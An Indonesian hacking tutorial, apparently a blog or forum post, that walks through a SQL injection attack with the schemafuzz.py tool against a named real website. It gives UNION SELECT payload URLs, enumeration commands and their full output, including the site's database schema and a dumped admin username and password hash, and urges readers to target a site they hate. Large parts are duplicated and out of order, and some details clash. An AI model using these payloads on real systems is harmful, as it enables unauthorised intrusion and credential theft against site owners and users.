Hello Semua,,,,,,,,,,,,,,,,,,
1. Kita Gunakan Di Target Kita. Disini Saya Ambil Target
www.primausada.com/news.php?news_id=1
2. Cek Kolomnya
schemafuzzy.py -u http://www.primausada.com/news.php?news_id=1 --findcol
Hingga muncul
============================================================
|---------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------|
[+] URL:http://www.primausada.com/news.php?news_id=1--
[+] Evasion Used: "+" "--"
[+] 20:36:08
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 1
[+] SQLi URL: http://www.primausada.com/news.php?news_id=1+AND+1=2+UNION+SELECT+0,1,2,3--
[+] darkc0de URL: http://www.primausada.com/news.php?news_id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3
[-] Done!
==========================================================
4. Cari Nama Table Dalam Database
schemafuzz.py -u "http://www.primausada.com/news.php?news_id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3" --schema -D t59395_primausada
akan muncul
==========================================================
|---------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------|
[+] URL:http://www.primausada.com/news.php?news_id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3--
[+] Evasion Used: "+" "--"
[+] 20:45:26
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t59395_primausada
User: t59395_pu@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t59395_primausada"
[+] Number of Tables: 10
[Database]: t59395_primausada
[Table: Columns]
[0]detoks: detoks_id,topic_id,detoks_content,insert_by,update_by
[1]detoks_topic: topic_id,topic
[2]klinik: klinik_id,topic_id,klinik_content,insert_by,update_by
[3]klinik_topic: topic_id,topic
[4]news: news_id,news_date,update_date,news_title,news_summary,news_content,insert_by,update_by,front_yn
[5]product: product_id,product_img,product_name,product_cat,product_desc,product_use,product_price,insert_by,update_by
[6]product_category: category_codes,category_desc,insert_by,update_by
[7]profile: content_id,content,insert_by,update_by
[8]testimonial: testi_id,patient_name,patient_age,patient_gender,patient_reg_date,patient_phone,testi_date,testi_content,testi_pict_link,update_by,insert_by
[9]user_account: user_id,username,password,first_name,last_name,create_date
[-] [20:46:40]
[-] Total URL Requests 59
[-] Done
==========================================================
Keluar semua colomnya... dari sini kita mengetahui bahwa web tersebut memiliki 10 colomn. Sekarang kita tinggal pilih kolom yang akan kita exploit ....
Kali ini saya akan membahas sekilas tentang Hacking Menggunakan schemafuzzy.py.
Schema Fuzzy adalah tools yang di buat dengan bahasa python yang dipergunakan untuk melakukan test SQL Injection pada sebuah website scripts file nya bisa di download disini, adapun feature dan hal2 yang di butuhkan yaitu :
1. Komputer (fast speed)
2. Koneksi internet (fast connection)
3. Program Python-2.5 (bisa di download Disini)
4. script schemafuzzy.py (kalau scriot di atas udah di download di ganti dengan nama schemafuzzy.py)
5. CMD
6. target website (cari di google atau bisa web yang paling kamu benci)
Sudah Di siapkan?
install terlebih dahulu python25 kamu. Copy python.py ke dalam dir python25. Kalo sudah selesai langsung jalankan. Caranya :
klik start>>Run>>CMD
truss and aktif ke directory c:\
masuk ke directory Python25 dengan cara ketik "cd Python25" hingga muncul
C:\Python25>
1. Komputer (fast speed)
2. Koneksi internet (fast connection)
3. Program Python-2.5 (bisa di download Disini)
4. script schemafuzzy.py (kalau scriot di atas udah di download di ganti dengan nama schemafuzzy.py)
5. CMD
6. target website (cari di google atau bisa web yang paling kamu benci)
Sudah Di siapkan?
install terlebih dahulu python25 kamu. Copy python.py ke dalam dir python25. Kalo sudah selesai langsung jalankan. Caranya :
klik start>>Run>>CMD
truss and aktif ke directory c:\
masuk ke directory Python25 dengan cara ketik "cd Python25" hingga muncul
C:\Python25>
Perintah dasar schemafuzzy ini yaitu :
schemafuzzy.py -u "target" –perintah
schemafuzzy.py -u "target" –perintah
1. Kita Gunakan Di Target Kita. Disini Saya Ambil Target
www.primausada.com/news.php?news_id=1
2. Cek Kolomnya
schemafuzzy.py -u http://www.primausada.com/news.php?news_id=1 --findcol
Hingga muncul
============================================================
|---------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------|
[+] URL:http://www.primausada.com/news.php?news_id=1--
[+] Evasion Used: "+" "--"
[+] 20:36:08
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,
[+] Column Length is: 4
[+] Found null column at column #: 1
[+] SQLi URL: http://www.primausada.com/news.php?news_id=1+AND+1=2+UNION+SELECT+0,1,2,3--
[+] darkc0de URL: http://www.primausada.com/news.php?news_id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3
[-] Done!
==========================================================
3. Cari Db nya..
schemafuzz.py -u "http://www.primausada.com/news.php?news_id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3" --dbs
hingga muncul
==========================================================
|---------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------|
[+] URL:http://www.primausada.com/news.php?news_id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3--
[+] Evasion Used: "+" "--"
[+] 20:42:20
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t59395_primausada
User: t59395_pu@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] t59395_primausada
[-] [20:42:22]
[-] Total URL Requests 3
[-] Done
==========================================================
Kita sudah temukan data base site tersebut "t59395_primausada"
schemafuzz.py -u "http://www.primausada.com/news.php?news_id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3" --dbs
hingga muncul
==========================================================
|---------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------|
[+] URL:http://www.primausada.com/news.php?news_id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3--
[+] Evasion Used: "+" "--"
[+] 20:42:20
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t59395_primausada
User: t59395_pu@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0] t59395_primausada
[-] [20:42:22]
[-] Total URL Requests 3
[-] Done
==========================================================
Kita sudah temukan data base site tersebut "t59395_primausada"
4. Cari Nama Table Dalam Database
schemafuzz.py -u "http://www.primausada.com/news.php?news_id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3" --schema -D t59395_primausada
akan muncul
==========================================================
|---------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------|
[+] URL:http://www.primausada.com/news.php?news_id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3--
[+] Evasion Used: "+" "--"
[+] 20:45:26
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t59395_primausada
User: t59395_pu@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t59395_primausada"
[+] Number of Tables: 10
[Database]: t59395_primausada
[Table: Columns]
[0]detoks: detoks_id,topic_id,detoks_content,insert_by,update_by
[1]detoks_topic: topic_id,topic
[2]klinik: klinik_id,topic_id,klinik_content,insert_by,update_by
[3]klinik_topic: topic_id,topic
[4]news: news_id,news_date,update_date,news_title,news_summary,news_content,insert_by,update_by,front_yn
[5]product: product_id,product_img,product_name,product_cat,product_desc,product_use,product_price,insert_by,update_by
[6]product_category: category_codes,category_desc,insert_by,update_by
[7]profile: content_id,content,insert_by,update_by
[8]testimonial: testi_id,patient_name,patient_age,patient_gender,patient_reg_date,patient_phone,testi_date,testi_content,testi_pict_link,update_by,insert_by
[9]user_account: user_id,username,password,first_name,last_name,create_date
[-] [20:46:40]
[-] Total URL Requests 59
[-] Done
==========================================================
Keluar semua colomnya... dari sini kita mengetahui bahwa web tersebut memiliki 10 colomn. Sekarang kita tinggal pilih kolom yang akan kita exploit ....
5. Exploit Table Dan Kolom
schemafuzz.py -u "http:///www.primausada.com/news.php?news_id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3" --dump -D t59395_primausada -T config -C username,password
dan akan muncul
==========================================================
|---------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------|
[+] URL:http://www.primausada.com/news.php?news_id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3--
[+] Evasion Used: "+" "--"
[+] 20:51:54
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t59395_primausada
User: t59395_pu@localhost
Version: 5.0.32-Debian_7etch8
[+] Dumping data from database "t59395_primausada" Table "user_account"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 1
[0] adhika:*E1EE7BF406887B7D4B90343450ADC71C267B9087:*E1EE7BF406887B7D4B90343450ADC71C267B9087:
[-] [20:52:01]
[-] Total URL Requests 3
[-] Done
==========================================================
Lihat " adhika:*E1EE7BF406887B7D4B90343450ADC71C267B9087:*E1EE7BF406887B7D4B90343450ADC71C267B9087: "
ini adalah username dan password... keluar sudah. tinggal decript aja MD5 nya ke bentuk aslinya... hehehe. Cara ini hanya berlaku untuk sql versi 5. untuk versi 4, anda bisa minta ke google. ( tergantung web x seh dia pake md5 atau apa).. tapi kebanyak web sekarang udah encrypt passwordx jadi agak susah.... Tapi ..... Tiada kata susah selama kita mau belajar.....
oke sekian dari saya.
segala penyalah gunaan dari artikel ini bukan Tanggung jawab penulis.
Semoga bermanfaat bagi anda.
Khusus bagi Anda Yang Blum mengerti anda bisa cari saya di irc@dal.net #dimensi
Thanks For All My friend...
schemafuzz.py -u "http:///www.primausada.com/news.php?news_id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3" --dump -D t59395_primausada -T config -C username,password
dan akan muncul
==========================================================
|---------------------------------------------------------|
| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |
|---------------------------------------------------------|
[+] URL:http://www.primausada.com/news.php?news_id=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3--
[+] Evasion Used: "+" "--"
[+] 20:51:54
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t59395_primausada
User: t59395_pu@localhost
Version: 5.0.32-Debian_7etch8
[+] Dumping data from database "t59395_primausada" Table "user_account"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 1
[0] adhika:*E1EE7BF406887B7D4B90343450ADC71C267B9087:*E1EE7BF406887B7D4B90343450ADC71C267B9087:
[-] [20:52:01]
[-] Total URL Requests 3
[-] Done
==========================================================
Lihat " adhika:*E1EE7BF406887B7D4B90343450ADC71C267B9087:*E1EE7BF406887B7D4B90343450ADC71C267B9087: "
ini adalah username dan password... keluar sudah. tinggal decript aja MD5 nya ke bentuk aslinya... hehehe. Cara ini hanya berlaku untuk sql versi 5. untuk versi 4, anda bisa minta ke google. ( tergantung web x seh dia pake md5 atau apa).. tapi kebanyak web sekarang udah encrypt passwordx jadi agak susah.... Tapi ..... Tiada kata susah selama kita mau belajar.....
oke sekian dari saya.
segala penyalah gunaan dari artikel ini bukan Tanggung jawab penulis.
Semoga bermanfaat bagi anda.
Khusus bagi Anda Yang Blum mengerti anda bisa cari saya di irc@dal.net #dimensi
Thanks For All My friend...